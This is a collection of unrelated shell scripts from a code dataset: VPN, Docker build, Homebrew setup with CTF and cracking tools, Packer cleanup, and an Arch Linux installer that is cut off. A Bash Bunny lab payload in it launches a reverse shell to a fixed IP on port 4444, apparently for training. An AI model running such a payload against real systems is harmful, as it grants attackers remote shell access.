# Connect to Cisco SSL VPN using passwords from stdin (passed by VPN_PASS variable created prior)
# Creates the tun interface, backs up resolv.conf, starts openconnect in
# the background and verifies the HTTP 200 CONNECT response; on failure
# it rolls everything back, on success it drops the $PID marker and
# installs the NAT rules.
function connect_vpn(){
    if [ -f $PID ]
    then
        printf "Openconnect is already running\n"
        exit 1
    else
        openvpn --mktun --dev ${VPN_TUNN}
        ifconfig ${VPN_TUNN} up
        printf "Tunnel interface (${VPN_TUNN}) created!\n"
        cp /etc/resolv.conf /etc/resolv.conf.orig
        printf "Backed up /etc/resolv.conf!\n"
        # NOTE(review): the VPN password is hard-coded in this script and
        # piped through echo -- consider reading it from a protected file.
        echo ${VPN_PASS} | openconnect -b --interface=${VPN_TUNN} --user=${VPN_USER} ${VPN_HOST} > $TEMP_LOG 2>&1
        if ! grep -i "Got CONNECT response: HTTP/1.1 200 OK" $TEMP_LOG
        then
            printf "Openconnect failed to start!\n"
            cat $TEMP_LOG
            ifconfig ${VPN_TUNN} down
            openvpn --rmtun --dev ${VPN_TUNN}
            printf "Tunnel interface (${VPN_TUNN}) destroyed!\n"
            cp /etc/resolv.conf.orig /etc/resolv.conf
            printf "Restored original /etc/resolv.conf!\n"
            exit 2
        else
            touch $PID
            printf "Openconnect started!\n"
            exec_iptables
            printf "Routing started!\n"
        fi
    fi
}
# Report whether openconnect appears to be running, judged purely by the
# presence of the $PID marker file.
function check_openconnect(){
    if [[ -f "$PID" ]]; then
        echo "Openconnect is running!"
    else
        echo "Openconnect is stopped"
    fi
}
# Confirm if PID file exists, then kill it immediately
# Also tears down the tunnel interface and restores the original
# resolv.conf that connect_vpn backed up.
function kill_openconnect(){
    if [ -f $PID ]
    then
        rm -f $PID >/dev/null 2>&1
        kill -9 $(pgrep openconnect) >/dev/null 2>&1
        printf "Openconnect stopped!\n"
        ifconfig ${VPN_TUNN} down
        openvpn --rmtun --dev ${VPN_TUNN}
        printf "Tunnel interface (${VPN_TUNN}) destroyed!\n"
        cp /etc/resolv.conf.orig /etc/resolv.conf
        printf "Restored original /etc/resolv.conf!\n"
    else
        printf "Openconnect is not running!\n"
    fi
}
# Dispatch on the requested action (start|stop|status|restart).
case "$1" in
    start)
        connect_vpn
        ;;
    stop)
        kill_openconnect
        ;;
    status)
        check_openconnect
        ;;
    restart)
        # re-invoke this script so each step gets a fresh environment
        $0 stop
        $0 start
        ;;
    *)
        echo "$INFO"
        exit 0
        ;;
esac
| true
|
4a2f66e7f7bb787233a828a397ea744eccd32a30
|
Shell
|
packform/netlify-cms-github-oauth-provider
|
/.buildkite/build.sh
|
UTF-8
| 965
| 3.53125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# This script runs the build process for the Dockerfile defined in this repo.
# Do the following prior to run:
# 1) Set these environment variables:
#      AWS_DEFAULT_REGION     - for now "us-west-1"
#      AWS_ACCESS_KEY_ID      - for now use value in Ansible production playbooks
#      AWS_SECRET_ACCESS_KEY  - for now use value in Ansible production playbooks
# 2) Ensure current working directory set to root of this repo
registry=495388981531.dkr.ecr.us-west-1.amazonaws.com

set -e
echo "Logging in to the Docker image registry..."
aws ecr get-login-password | docker login --username AWS --password-stdin "$registry"
set +e

echo "Building and uploading image..."
sha="$(git rev-parse HEAD)"

# fail() logs out before exiting so an aborted run never leaves cached
# registry credentials behind. BUG FIX: the original
# "[[ $? -ne 0 ]] && docker logout && exit -1" chain skipped the exit
# whenever the logout itself failed, and "exit -1" is not a valid
# exit status (it wraps to 255); use a plain exit 1.
fail() {
    docker logout "$registry"
    exit 1
}

docker build -f Dockerfile -t "$registry/pp-web-oauth:$sha" . --force-rm || fail
docker push "$registry/pp-web-oauth:$sha" || fail
docker logout "$registry"
| true
|
7e46227d1107ef03099f8f2c5a6f0735d58a2e05
|
Shell
|
zachroofsec/bash-bunny-lab
|
/payloads/LinuxReverseShell/payload.sh
|
UTF-8
| 585
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# INSPIRED BY: https://github.com/hak5/bashbunny-payloads/blob/27d63ad5a535510b20787cc03850b28bbdb727ee/payloads/library/remote_access/LinuxReverseShell/payload.txt
# Runs a script in the background that creates a reverse shell connection to the configured address and then removes itself.

# Create mock Bash Bunny USB drive directory
BASH_BUNNY_DIR=$HOME/bash_bunny
PAYLOAD_DIR=$BASH_BUNNY_DIR/payloads/LinuxReverseShell
mkdir -p $BASH_BUNNY_DIR $PAYLOAD_DIR

# Config options
REMOTE_HOST=172.31.24.230
REMOTE_PORT=4444

# Hand off to the actual reverse-shell payload.
# NOTE(review): a.sh is expected to already exist in $PAYLOAD_DIR; this
# script only creates the directory, not the payload itself.
bash $PAYLOAD_DIR/a.sh $REMOTE_HOST $REMOTE_PORT
| true
|
77ef17b167d73513644eff2824421d673f134485
|
Shell
|
grycap/scar
|
/examples/video-process/split-video.sh
|
UTF-8
| 247
| 2.671875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#! /bin/sh
# Extract one JPEG frame per second from $INPUT_FILE_PATH into $TMP_OUTPUT_DIR.
echo "SCRIPT: Splitting video file $INPUT_FILE_PATH in images and storing them in $TMP_OUTPUT_DIR. One image taken each second"
# Paths come from the environment, so quote them to survive spaces;
# </dev/null keeps ffmpeg from consuming the caller's stdin.
ffmpeg -loglevel info -nostats -i "$INPUT_FILE_PATH" -q:v 1 -vf fps=1 "$TMP_OUTPUT_DIR/out%03d.jpg" < /dev/null
| true
|
e67d1d908c1779abeee135ab3e67aee5881c3f30
|
Shell
|
rofl0r/irix-3.x-src
|
/etc/mkswapdd.sh
|
UTF-8
| 534
| 3.625
| 4
|
[] |
no_license
|
#! /bin/sh
#
# This will create the swapfs_dd file in /stand
#
# devnm prints "<device> <mountpoint>" for /; "set" puts the device
# name into $1, which we copy into $dev.
dev=
set `devnm /`
dev=$1
if test $dev = 'md0a'
then
    echo " swapfs: ST-506 Disk Drives"
    echo " swapfs: dd if=/dev/rmd0b of=/stand/swapfs_dd bs=250k count=4"
    dd if=/dev/rmd0b of=/stand/swapfs_dd bs=250k count=4
elif test $dev = 'ip0a'
then
    echo " swapfs: SMD Disk Drives"
    echo " swapfs: dd if=/dev/rip0b of=/stand/swapfs_dd bs=250k count=4"
    dd if=/dev/rip0b of=/stand/swapfs_dd bs=250k count=4
else
    echo " swapfs: Unrecognized root file system"
    exit 1
fi
| true
|
4544790a0973af3bb2e4181deaeff662a0b77834
|
Shell
|
rastitkac/awesome-dotfiles
|
/brew.sh
|
UTF-8
| 3,570
| 2.875
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
#!/usr/bin/env bash

# Install command-line tools using Homebrew.

# Make sure we're using the latest Homebrew.
brew update

# Upgrade any already-installed formulae.
brew upgrade

# Save Homebrew's installed location.
BREW_PREFIX=$(brew --prefix)

# Install GNU core utilities (those that come with macOS are outdated).
# Don't forget to add `$(brew --prefix coreutils)/libexec/gnubin` to `$PATH`.
brew install coreutils
ln -s "${BREW_PREFIX}/bin/gsha256sum" "${BREW_PREFIX}/bin/sha256sum"

# Install some other useful utilities like `sponge`.
brew install moreutils
# Install GNU `find`, `locate`, `updatedb`, and `xargs`, `g`-prefixed.
brew install findutils
# Install GNU `sed`, overwriting the built-in `sed`.
brew install gnu-sed

# Install ZSH and zsh-completions
brew install zsh
brew install zsh-completions

# Install Mac App Store command line interface
brew install mas

# Install `wget` with IRI support.
brew install wget

# Install GnuPG to enable PGP-signing commits.
brew install gnupg

# Install more recent versions of some macOS tools.
brew install vim
brew install grep
brew install openssh
brew install screen
brew install gmp

# Install font tools.
brew tap bramstein/webfonttools
brew install sfnt2woff
brew install sfnt2woff-zopfli
brew install woff2

# Install some CTF tools; see https://github.com/ctfs/write-ups.
brew install aircrack-ng
brew install bfg
brew install binutils
brew install binwalk
brew install cifer
brew install dex2jar
brew install dns2tcp
brew install fcrackzip
brew install foremost
brew install hashpump
brew install hydra
brew install john
brew install knock
brew install netpbm
brew install nmap
brew install pngcheck
brew install socat
brew install sqlmap
brew install tcpflow
brew install tcpreplay
brew install tcptrace
brew install ucspi-tcp # `tcpserver` etc.
brew install xpdf
brew install xz

# Install other useful binaries.
brew install ack
brew install git
brew install git-lfs
# NOTE(review): per-formula install options such as --with-webp were
# removed from Homebrew core in 2018 -- on a current brew this errors out.
brew install imagemagick --with-webp
brew install lynx
brew install p7zip
brew install pigz
brew install pv
brew install rename
brew install rlwrap
brew install ssh-copy-id
brew install tree
brew install vbindiff
brew install zopfli
brew install watch
brew install wrk
brew install sslscan
brew install tmux
brew install peco

# Development
brew install ansible
brew install awscli
brew install protobuf
brew install direnv # direnv for managing .envrc based environments
brew install go
brew install htop
brew install hub
brew install jq
brew install openssl
brew install packer
brew install pre-commit
brew install python3
brew install readline
brew install rsync
brew install telnet
brew install terraform
brew install terragrunt
brew install tmate # https://tmate.io/ Instant terminal sharing
brew install semaphoreci/tap/sem # semaphore ci
brew install websocat # websocat
brew install ripgrep # ripgrep recursively searches directories for a regex pattern
brew install libpq # install postgres tools without installing full postgres
brew install elixir # elixir programming language

# miniconda python environment manager
# NOTE(review): "brew cask install" was removed in Homebrew 2.6; current
# brew needs "brew install --cask" for this and the cask lines below.
brew cask install miniconda

# Java 11
brew tap homebrew/cask-versions
brew cask install java

# Displayplacer https://github.com/jakehilborn/displayplacer
brew tap jakehilborn/jakehilborn
brew install displayplacer

# Spectacle
brew cask install spectacle

# casks
brew cask install aws-vault
brew cask install font-hack-nerd-font
brew cask install time-out

# Remove outdated versions from the cellar.
brew cleanup
| true
|
a240cc763ddac0081b4a109dbd04251d55c4f673
|
Shell
|
ss7pro/cloud
|
/scr.good/novnc.sh
|
UTF-8
| 719
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
. settings
# Install noVNC and register nova-novncproxy as a daemontools-style
# service under /etc/service, logging via multilog to /var/log/dt.
setup_novnc () {
    # BUG FIX: the original ran "apt-get -yy novnc python-numpy" with no
    # subcommand, which installs nothing; it needs "install".
    apt-get install -y novnc python-numpy
    for i in 'nova-novncproxy' ; do
        # NOTE(review): the init script stopped/removed here is "novnc",
        # while the supervised service is "$i" -- confirm the asymmetry
        # is intentional.
        service novnc stop
        update-rc.d -f novnc remove
        mkdir -p /var/log/dt/$i
        chmod 750 /var/log/dt/$i
        chown nova:syslog /var/log/dt/$i
        # Stage the service directory hidden (with a "down" file) and
        # rename it into place atomically so svscan never sees a
        # half-built service.
        mkdir -p /etc/service/.$i
        touch /etc/service/.$i/down
        mv /etc/service/.$i /etc/service/$i
        cat > /etc/service/$i/run <<EOF
#!/bin/bash
exec setuidgid nova $i --config-file=/etc/nova/nova.conf --web /usr/share/novnc/ 2>&1
EOF
        chmod 755 /etc/service/$i/run
        mkdir -p /etc/service/$i/log
        cat > /etc/service/$i/log/run <<EOF
#!/bin/bash
exec setuidgid nova multilog t s16777215 n10 /var/log/dt/${i}
EOF
        chmod 755 /etc/service/$i/log/run
    done
}
setup_novnc
| true
|
59c6610c78e8198025ee4bec86dade63e3fbc3ef
|
Shell
|
benjamincjackson/mice_LD
|
/2_run_SHAPEIT/run_shapeit_assemble.sh
|
UTF-8
| 625
| 2.71875
| 3
|
[] |
no_license
|
#!/bin/bash
# Phase a single chromosome with SHAPEIT in assemble mode, combining the
# phase-informative reads (PIRs) from the previous step with the
# (single chromosome) VCF file. With default options the command is:
#   shapeit -assemble --input-vcf vcf --input-pir pirs -O haplotypes
CHR=$1
# Expansions are quoted so an unexpected chromosome label cannot
# word-split the file paths.
/localdisk/home/bjackso4/programs/shapeit-2.12/bin/shapeit -assemble \
    --input-vcf "/localdisk/home/bjackso4/mice_LD/Mmd/VCF/${CHR}.recoded.vcf.gz" \
    --input-pir "/localdisk/home/bjackso4/mice_LD/Mmd/1_extract_PIRs_out/PIRs_${CHR}.txt" \
    -O "../2_run_SHAPEIT_out/haplotypes_${CHR}" \
    --thread 4
| true
|
6b6aa0a1839f19153b531c2de59b3d60e1b47ca0
|
Shell
|
hengyang-zhao/nidus
|
/assets/exec/perm-stack
|
UTF-8
| 517
| 3.8125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Walk from a directory (arg 1, default: cwd) up to /, printing each
# ancestor's permission bits (yellow) and backing device (green).
set -euo pipefail

DIR=${1:-$(pwd)}
# Normalise a relative argument into an absolute path.
if [ "${DIR:0:1}" != / ]; then
    DIR="$(pwd)/$DIR"
fi

while :; do
    # Unreadable entries render as "??????????" instead of aborting.
    perm="$(stat -c %A "$DIR" 2>/dev/null)"
    if [ -z "$perm" ]; then
        perm="??????????"
    fi
    dev="$(df -P "$DIR" 2>/dev/null | tail -1 | cut -d' ' -f1)"
    if [ -z "$dev" ]; then
        dev="??????????"
    fi
    echo "$(tput setaf 3)$perm$(tput sgr0) $(tput setaf 2)$dev$(tput sgr0) $DIR"
    if [ "$DIR" = / ]; then
        break;
    fi
    DIR="$(dirname "$DIR")"
done
| true
|
fa60ac0c460bea93d960ab3db5ec71a4b0a35d47
|
Shell
|
davo/Lona
|
/config/pre-commit-swiftlint.sh
|
UTF-8
| 986
| 3.96875
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Pre-commit hook: run SwiftLint over the staged files passed as arguments.

cd studio || exit 1

# Path to swiftlint when in the studio
SWIFT_LINT=./Pods/SwiftLint/swiftlint

if [[ -e "${SWIFT_LINT}" ]]; then
    count=0
    # FIX: iterate "$@" quoted so paths containing spaces stay intact.
    for file_path in "$@"; do
        export SCRIPT_INPUT_FILE_$count="$file_path"
        count=$((count + 1))
    done

    ##### Make the count available as a global variable #####
    export SCRIPT_INPUT_FILE_COUNT=$count
    echo "${SCRIPT_INPUT_FILE_COUNT}"

    ##### Lint files or exit if no files found for linting #####
    if [ "$count" -ne 0 ]; then
        echo "Found lintable files! Linting..."
        $SWIFT_LINT lint --use-script-input-files --config .swiftlint.yml
    else
        echo "No files to lint!"
        exit 0
    fi

    RESULT=$?

    if [ $RESULT -eq 0 ]; then
        :
    else
        echo ""
        echo "Violation found of the type ERROR! Must fix before commit!"
    fi
    exit $RESULT
else
    # BUG FIX: the original used backticks inside double quotes, so the
    # command "cd studio && bundle && bundle exec pod install" was
    # *executed* while printing this warning. The backticks are now
    # escaped so the message prints literally.
    echo "warning: SwiftLint not installed, please run \`cd studio && bundle && bundle exec pod install\`"
fi
| true
|
67f3ae6b54b0c8cb7e13be3f5588f0aa2de5ddd7
|
Shell
|
gladiopeace/qubes-updates-cache
|
/install
|
UTF-8
| 226
| 2.71875
| 3
|
[] |
no_license
|
#!/bin/sh
# Create the vm-updates system user and install the updates-cache files
# into $DESTDIR (for packaging, $DESTDIR may be a staging root).
set -ex
id=vm-updates
# Create the user only if it does not exist yet, so the install is idempotent.
getent passwd $id >/dev/null ||
useradd --shell /bin/false --home / --system --user-group $id
install -d -m 750 -o $id -g $id "$DESTDIR"/var/lib/qubes/$id
umask 022
cp -R etc usr "$DESTDIR"/
| true
|
c5a8415c7a5f7a3c484879a2a97d605ef023a173
|
Shell
|
SMALLIKA-ECU/CSP2101
|
/scratch/exam.sh
|
UTF-8
| 210
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
# Translate an ECU grade code (first argument) into its full name.
grade_name="Unknown Grade"
case "$1" in
    HD) grade_name="High Distinction" ;;
    D)  grade_name="Distinction" ;;
    CR) grade_name="Credit" ;;
    C)  grade_name="Pass" ;;
    N)  grade_name="Fail" ;;
esac
echo "$grade_name"
exit
| true
|
2a146c8a0acac7812c2190fa72130c28b267ef1d
|
Shell
|
ozio/react-intl-google-docs
|
/push.sh
|
UTF-8
| 464
| 3.671875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Prompt with "$1 (y/N): " and print "yes" when the answer is y/yes in
# any capitalisation, otherwise "no".
function ask_yes_or_no() {
    read -p "$1 (y/N): "
    local lowered
    lowered=$(echo $REPLY | tr '[A-Z]' '[a-z]')
    if [ "$lowered" = "y" ] || [ "$lowered" = "yes" ]; then
        echo "yes"
    else
        echo "no"
    fi
}
# Regenerate the translation files, show the diff, then push only after
# the user confirms; otherwise discard the regenerated files.
node --no-warnings ./
git --no-pager diff translations
if [[ "no" == $(ask_yes_or_no "Push this changes to repository?") ]]
then
    git checkout translations/*   # revert the regenerated files
    echo "Skipped."
    exit 0
fi
now=$(date)
git add translations
git commit -m "$now Translation updates"
git push origin master
| true
|
8a3e34ca3aca2823ce1bd94528b1bff3c702d3ed
|
Shell
|
samdoran/packer-rhel7
|
/scripts/cleanup.sh
|
UTF-8
| 631
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/bash
# Packer post-provision cleanup: strip packages, caches and docs, then
# zero the free space so the resulting image compresses well.

# Remove Ansible and its dependencies.
yum -C -y autoremove ansible
yum -C -y remove kernel-firmware 'iwl*'

# Delete old kernels
package-cleanup -C -y --oldkernels --count=1

# Clean yum cache
echo "Cleaning up extra files"
rm -rf /var/cache/yum/*
rm -rf /usr/share/man/*
rm -rf /usr/share/info/*
rm -rf /usr/share/doc/*
rm -rf /usr/share/backgrounds/*
rpm --rebuilddb

# Zero out the rest of the free space using dd, then delete the written file.
# (dd is expected to exit non-zero when the disk fills up.)
echo "Reclaming free space on disk"
dd if=/dev/zero of=/EMPTY bs=1M
rm -f /EMPTY

# Add `sync` so Packer doesn't quit too early, before the large file is deleted.
sync
| true
|
55930579d7622e61ede9b26a569863ca146ec782
|
Shell
|
equk/i5700
|
/dalvik-cache/system/sd/userinit.sh
|
UTF-8
| 579
| 2.703125
| 3
|
[] |
no_license
|
#!/system/bin/sh
#
# Move dalvik-cache to /cache
#
# Remove Debugger Mem Dumps

# Recreate the cache directories only when /cache/dalvik-cache is missing
# (i.e. first boot after a wipe).
if [ ! -d /cache/dalvik-cache ]
then
    busybox rm -rf /cache/dalvik-cache /data/dalvik-cache
    mkdir /cache/dalvik-cache /data/dalvik-cache
fi
busybox chown 1000:1000 /cache/dalvik-cache   # uid/gid 1000 = Android system
busybox chmod 0771 /cache/dalvik-cache

# bind mount dalvik-cache so we can still boot without the sdcard
busybox mount -o bind /cache/dalvik-cache /data/dalvik-cache
busybox chown 1000:1000 /data/dalvik-cache
busybox chmod 0771 /data/dalvik-cache

# remove debugger memory dumps
busybox rm -rf /data/tombstones/*
| true
|
fec106f497761f7fb3f74a502e764ea1df46483b
|
Shell
|
pct/arch
|
/install.sh
|
UTF-8
| 12,173
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
###############################################################################
#
# This programm should help you install arch linux on your pc (version 4444)
# Copyright (C) Vienna 2012 by Mario Aichinger
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
###############################################################################
# Print $1, then let the user pick one entry from the whitespace-separated
# list in $2. Loops until a valid entry is chosen; the selection is left
# in the global $menu_item.
function ask_select()
{
    echo $1
    select menu_item in $2; do
        if [ -n "$menu_item" ]; then
            break
        fi
    done
}
# Print the feedback/contact banner shown at the end of the installer.
function sh_contact()
{
    cat <<'EOF'

Thank you for using!
If you have any feedback, wishes or errors please email me
at arch@mario-aichinger.at
Also feel free to leaf a comment on bbs.archlinux.org/viewtopic.php?id=146450

Happy hacking
Mario

EOF
}
# Ask for a console keyboard layout (preset list or free-form "other"),
# load it with loadkeys, and record the choice in the global $kbl.
# Relies on ask_select leaving the pick in $menu_item.
function ask_for_keyboard()
{
    ask_select "Select keyboardlayout:" "de en es fr us other"
    if [ "$menu_item" == "other" ]; then
        read -p "Other? :" menu_item;
    fi
    loadkeys $menu_item;
    kbl=$menu_item;
    unset menu_item;
}
# Ask whether to partition automatically; loops until the answer is a
# single y/Y/n/N, which is stored in the global $usefdisk.
function ask_use_fdisk()
{
    while true; do
        read -p "Use automatic patition [y/n]: " usefdisk;
        case "$usefdisk" in
            [YyNn]) break ;;
        esac
    done
}
# Interactively collect the automatic-partitioning parameters
# ($device, $bootsize, $swapsize and optionally $usesephome/$rootsize),
# looping until the user confirms the summary printed by
# show_partition_config.
function config_fdisk()
{
    if [[ "$usefdisk" =~ ^[Yy]$ ]]; then
        fdiskconfok="n";
        while [[ ! "$fdiskconfok" =~ ^[Yy]$ ]]; do
            read -p "Select device (default is [sda]): " device;
            read -p "Bootsize (default is 100M) [100[K/M/G]]: " bootsize;
            read -p "Swapsize (default is 1024M) [100[K/M/G]]: " swapsize;
            read -p "Use separat home partition (default is no)[y/n]: " usesephome;
            if [[ "$usesephome" =~ ^[Yy]$ ]]; then
                read -p "size for / (default is 3000M) [3000[K/M/G]]: " rootsize;
                if [ -z "$rootsize" ]; then
                    rootsize="3000M";
                fi
            fi
            # Fall back to the documented defaults for anything left blank.
            if [ -z "$bootsize" ]; then
                bootsize="100M";
            fi
            if [ -z "$swapsize" ]; then
                swapsize="1024M";
            fi
            if [ -z "$device" ]; then
                device="sda";
            fi
            show_partition_config;
            read -p "Config ok [y/n]? :" fdiskconfok;
        done
    else
        wait_for_usr "Continue?"
    fi
}
# Print the summary of the partitioning choices held in the globals
# $device, $bootsize, $swapsize, $usesephome and (optionally) $rootsize.
function show_partition_config()
{
    printf 'Device is %s\n' "$device"
    printf 'Size of /boot is %s\n' "$bootsize"
    printf 'Size of swap is %s\n' "$swapsize"
    if [[ "$usesephome" =~ ^[Yy]$ ]]; then
        printf 'Size of / is %s\n' "$rootsize"
        printf 'Using separat /home: Yes\n'
    else
        printf 'Using separat /home: No\n'
    fi
}
# Ask for a filesystem type and store it in a per-mountpoint global:
#   set_fs "home" "ext3"  -> sets $homefs (default ext3)
#   set_fs ""     "ext4"  -> sets $rootfs (default ext4)
function set_fs(){
    read -p "Set filesystem for /$1 (default is $2): " fs;
    if [ -z "$fs" ]; then
        fs=$2
    fi
    # FIX: assign with printf -v instead of eval, so an answer such as
    # "ext4; rm -rf /" can no longer be executed as shell code.
    if [ -z "$1" ]; then
        printf -v rootfs '%s' "$fs"
    else
        printf -v "${1}fs" '%s' "$fs"
    fi
}
# Pause until the user presses return; $1 is used as the prompt text.
# The throwaway answer is read into (and then removed from) the global $a.
function wait_for_usr()
{
    read -p "$1" a;
    unset a;
}
# Let the user choose a bootloader (GRUB, SYSLINUX or NONE); the choice
# is stored in the global $bootloader.
function ask_bootloader()
{
    ask_select "Select bootloader" "GRUB SYSLINUX NONE"
    bootloader="$menu_item"
    unset menu_item
}
# Build the list of network interfaces from /proc/net/dev and let the
# user pick one; the choice ends up in the global $network_if.
function ask_network_if(){
    ifs=""
    for i in `cat /proc/net/dev | grep ':' | cut -d ':' -f 1`; do
        ifs="$ifs $i";
    done
    ask_select "network" "$ifs"
    network_if=$menu_item;
    unset menu_item;
}
# Choose between dhcpcd and manual network configuration ($nw_method);
# for "manual", immediately collect the static parameters.
function ask_network_method()
{
    ask_select "Set network method" "dhcpcd manual";
    nw_method=$menu_item;
    unset menu_item;
    if [ "$nw_method" == "manual" ]; then
        ask_for_manual_network_data;
    fi
}
# Prompt until a non-empty value is entered; store it in the variable
# named by $1, using $2 as the prompt text.
function _read_required()
{
    local __var=$1 __prompt=$2 __val
    while [ 1 ]; do
        read -p "$__prompt" __val
        if [ "$__val" ]; then
            break
        fi
    done
    printf -v "$__var" '%s' "$__val"
}
# Collect the static network settings (ipaddress, subnetmask, gateway,
# broadcast, dnsserver), show a summary and repeat until confirmed.
# REFACTOR: the original repeated the same "loop until non-empty" block
# five times; it is now factored into _read_required above.
function ask_for_manual_network_data()
{
    while [ 1 ]; do
        _read_required ipaddress "IP (like 192.168.0.100): "
        _read_required subnetmask "Subnetmask (eg: 255.255.255.0): "
        _read_required gateway "Gateway (eg: 192.168.0.1): "
        _read_required broadcast "Broadcast (like 192.168.0.255)"
        _read_required dnsserver "DNS-Server (eg: 8.8.8.8 (google)): "
        echo "";
        echo "IP: $ipaddress";
        echo "Subnetmask: $subnetmask";
        echo "Gateway: $gateway";
        echo "Broadcast: $broadcast";
        echo "DNS: $dnsserver";
        read -p "Configuration ok[Y/n]: " ipconfigok
        if [[ "$ipconfigok" =~ ^[Yy]$ ]]; then
            break;
        fi
    done
}
# Ask whether to use a custom pacman mirror ($usecmirror, y/n); when
# yes, also record the mirror URL in $custom_mirror.
function ask_custom_mirror()
{
    while [ 1 ]; do
        read -p "Use custom mirror? [y/n]: " usecmirror
        if [[ "$usecmirror" =~ ^[Yy]$ ]] || [[ "$usecmirror" =~ ^[Nn]$ ]]; then
            if [[ "$usecmirror" =~ ^[Yy]$ ]]; then
                read -p "Enter the mirrors URL: " custom_mirror;
            fi
            break
        fi
    done
}
# Ask whether to install the base-devel group; loops until the answer is
# a single y/Y/n/N, stored in the global $installbasedevel.
function ask_base_devel()
{
    while true; do
        read -p "Install base-devel? [y/n]: " installbasedevel
        case "$installbasedevel" in
            [YyNn]) break ;;
        esac
    done
}
# Ask for extra packages to install (space separated, stored in $addPac).
function ask_add_packages()
{
    read -p "Enter additional packages (separated by [space]): " addPac;
}
# Ask for the local DNS domain; defaults to "localdomain".
# BUG FIX: the prompt used to read into the misspelled variable
# "localedomain", so the user's answer was always discarded and
# $localdomain silently stayed at its default.
function ask_for_localdomain()
{
    read -p "Enter the localdomain [localdomain]: " localdomain;
    if [ -z "$localdomain" ]; then
        localdomain="localdomain";
    fi
}
# Ask until a non-empty hostname is entered; result in the global $hostname.
# BUG FIX: the original unquoted test `[ $hostname ]` errors out
# ("too many arguments") when the answer contains whitespace.
function ask_for_hostname()
{
    while [ 1 ]; do
        read -p "Enter the new hostname: " hostname;
        if [ -n "$hostname" ]; then
            break;
        fi
    done
}
# Pick a timezone from /usr/share/zoneinfo, descending one level into
# region directories; the result path is left in $zone_path (with the
# components in $zone and, when applicable, $subzone).
function ask_for_zone()
{
    first_zones=$(ls -1 /usr/share/zoneinfo);
    ask_select "Select Zone: " "$first_zones";
    zone=$menu_item;
    zone_path="/usr/share/zoneinfo/$zone";
    if [ -d "/usr/share/zoneinfo/$zone" ]; then
        second_zones=$(ls -1 /usr/share/zoneinfo/$zone)
        ask_select "Select SubZone: " "$second_zones"
        subzone=$menu_item;
        zone_path="/usr/share/zoneinfo/$zone/$subzone"
    fi
    unset menu_item;
}
# Choose the system locale (preset list or free-form "other"); the
# result is stored in the global $locale.
function ask_locale()
{
    ask_select "Locale: " "de_DE.UTF-8 en_US.UTF-8 es_ES.UTF-8 other";
    locale=$menu_item;
    if [ "$locale" == "other" ]; then
        read -p "Locale: " locale;
    fi
}
# Read the root password twice with terminal echo disabled, repeating
# until both entries match ($passwd1/$passwd2).
function ask_for_root_password()
{
    while true; do
        stty -echo
        read -p "Password: " passwd1; echo
        read -p "Password: " passwd2; echo
        stty echo
        if [ "$passwd1" != "$passwd2" ]; then
            echo "Passwords do not match. Please try again.";
        else
            break
        fi
    done
}
# Tell the user to partition by hand on another virtual terminal, then
# block until they press return.
# NOTE(review): wait_for_usr is called without a prompt argument here,
# so the pause shows no text -- confirm that is intended.
function ask_for_manual_partition()
{
    echo "plase use an other terminal to patition [alt]+[F2-F6]";
    wait_for_usr
}
# Drive fdisk non-interactively to (re)create the partition table on
# /dev/$device: delete partitions 1-4, then create boot (+$bootsize),
# swap (+$swapsize) and root, mark partition 1 bootable and type 82 (swap)
# on partition 2. With a separate /home the root gets +$rootsize and the
# remainder becomes partition 4. Keystrokes are fed verbatim through
# here-documents, so the heredoc bodies below must not be reformatted.
# NOTE(review): in the no-separate-home branch the line "#3" is sent to
# fdisk literally (it is heredoc text, not a shell comment) - confirm this
# sequence is intentional before reusing.
function start_partition()
{
if [[ "$usesephome" =~ ^[Yy]$ ]]; then
fdisk /dev/$device << EOF
d
1
d
2
d
3
d
4
n
p
1

+$bootsize
n
p
2

+$swapsize
n
p
3

+$rootsize
n
p


a
1
t
2
82
p
w
EOF
else
fdisk /dev/$device << EOF
d
1
d
2
d
#3
d
4
n
p
1

+$bootsize
n
p
2

+$swapsize
n
p
3


a
1
t
2
82
p
w
EOF
fi
}
# Dispatch to automatic fdisk scripting or manual partitioning, depending
# on the y/n answer collected earlier in $usefdisk.
function do_partition(){
  case "$usefdisk" in
    [Yy]) start_partition ;;
    *)    ask_for_manual_partition ;;
  esac
}
# Create the filesystems chosen earlier: $bootfs on partition 1, swap on 2,
# $rootfs on 3 and, when a separate /home was requested, $homefs on 4.
function do_formating()
{
mkfs -t "$bootfs" /dev/"$device"1;
mkswap /dev/"$device"2
mkfs -t "$rootfs" /dev/"$device"3;
if [[ "$usesephome" =~ ^[Yy]$ ]]; then
mkfs -t "$homefs" /dev/"$device"4;
fi
}
# Mount the freshly formatted target tree under /mnt: root first, then
# /mnt/boot and, optionally, the separate /home partition.
function do_mount()
{
mount /dev/"$device"3 /mnt;
mkdir /mnt/boot;
mount /dev/"$device"1 /mnt/boot;
if [[ "$usesephome" =~ ^[Yy]$ ]]; then
mkdir /mnt/home;
mount /dev/"$device"4 /mnt/home;
fi
}
# Bring up networking in the live environment, either via DHCP or with the
# static parameters collected earlier (ipaddress/subnetmask/gateway/dnsserver).
# NOTE(review): 'ifconfig <if> address <ip>' - the "address" keyword is
# unusual for classic ifconfig; verify against the live medium's ifconfig.
function do_network()
{
if [ "$nw_method" == "dhcpcd" ]; then
dhcpcd "$network_if";
else
ifconfig "$network_if" address "$ipaddress" netmask "$subnetmask"
ip route add default via "$gateway";
ip link set "$network_if" up
# Inject the chosen nameserver while keeping the replaceable marker line.
